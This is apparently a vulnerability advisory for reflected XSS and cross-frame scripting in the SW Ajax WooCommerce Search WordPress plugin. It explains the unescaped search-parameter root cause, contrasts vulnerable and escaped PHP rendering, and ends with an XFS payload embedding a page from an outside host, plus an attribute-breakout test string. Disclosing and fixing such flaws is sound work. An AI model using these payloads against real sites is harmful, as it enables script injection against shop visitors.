Unauthenticated Reflected XSS and XFS (cross-frame scripting) vulnerabilities were discovered in the SW Ajax WooCommerce Search plugin v1.2.6 for WordPress.
The plugin is bundled with a number of commercial themes, such as: OneMall, Revo, eMarket, Autusin, Market, MaxShop, ShoppyStore, Furnicom, EtroStore, HiTheme, StyleShop, TopDeal, Victo, Avesa, Soaz, Binace, Houskit, Gaion, Furniki, Rozy, SecretSho, BosMarket, Siezz, HiStore, Ecomart, iMarket, NeoMarket, 9Merry, LeVogue, Floris, Alishop, KONStore, ShopyMall, DresShop, Shop4U, FurniHome and Tech8, and the vendor is releasing new theme versions that ship the updated plugin.
Proof of Concept
<input class="autosearch-input" type="text" value="<?php echo ( ( isset( $_GET['s'] ) && $_GET['s'] ) ? ( $_GET['s'] ) : "" ); ?>" size="50" autocomplete="off" placeholder="<?php echo esc_attr__( 'Search Item...', 'sw_ajax_woocommerce_search' ); ?>" name="s">
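The line above is the root cause: the raw $_GET['s'] value is concatenated straight into the value="" attribute without escaping, so a value that starts with "> closes the attribute and the tag, and whatever follows is rendered as markup. The following is an added example, not the plugin's own code: it places the vulnerable rendering next to a hardened version that passes the value through esc_attr(). Outside WordPress esc_attr() does not exist, so the script defines a stand-in with the same intent (htmlspecialchars with ENT_QUOTES); the function names and the sample search terms are constructed for this demonstration.

```php
<?php
// Added example (not the plugin's own code): renders the search box with
// the untrusted $_GET['s'] value escaped for an HTML attribute context.
// Assumption: when run outside WordPress, esc_attr() is undefined, so a
// fallback with equivalent behaviour (htmlspecialchars, ENT_QUOTES) is used.

if ( ! function_exists( 'esc_attr' ) ) {
    function esc_attr( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' );
    }
}

// Vulnerable form, mirroring the advisory: the raw query value is placed
// inside value="" unescaped, so a leading "> terminates the attribute and
// the <input> tag and any trailing markup is rendered by the browser.
function render_search_input_vulnerable( array $get ) {
    $s = ( isset( $get['s'] ) && $get['s'] ) ? $get['s'] : '';
    return '<input class="autosearch-input" type="text" value="' . $s . '" size="50" name="s">';
}

// Hardened form: the same value goes through esc_attr(), which converts
// " ' < > and & into entities, so it can neither close the attribute nor
// open a new tag. In WordPress code this is the core esc_attr() function.
function render_search_input_hardened( array $get ) {
    $s = ( isset( $get['s'] ) && $get['s'] ) ? $get['s'] : '';
    return '<input class="autosearch-input" type="text" value="' . esc_attr( $s ) . '" size="50" name="s">';
}

// Constructed sample inputs: a benign search term and a term that tries to
// break out of the attribute with harmless bold markup.
$samples = array(
    'blue shoes',
    '"><b>injected</b>',
);

foreach ( $samples as $term ) {
    echo "input : {$term}\n";
    echo "vuln  : " . render_search_input_vulnerable( array( 's' => $term ) ) . "\n";
    echo "fixed : " . render_search_input_hardened( array( 's' => $term ) ) . "\n\n";
}
```

Run it with `php example.php`: for the second sample the vulnerable output contains a closed <input> tag followed by a live <b> element, while the hardened output keeps the whole term inside the attribute as `&quot;&gt;&lt;b&gt;injected&lt;/b&gt;`. The same escaping closes both findings in the advisory, because the XFS payload also depends on breaking out of the value attribute before it can inject an <embed> element; a Content-Security-Policy that restricts frame-src and object-src adds defence in depth but is no substitute for escaping at the output point.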
[$] :: Payloads:
XFS: "><embed src="https://ex-mi.ru/payload/xfsii.html">
[!] :: PoC Unauthenticated Reflected XSS:
[!] :: PoC Unauthenticated XFS: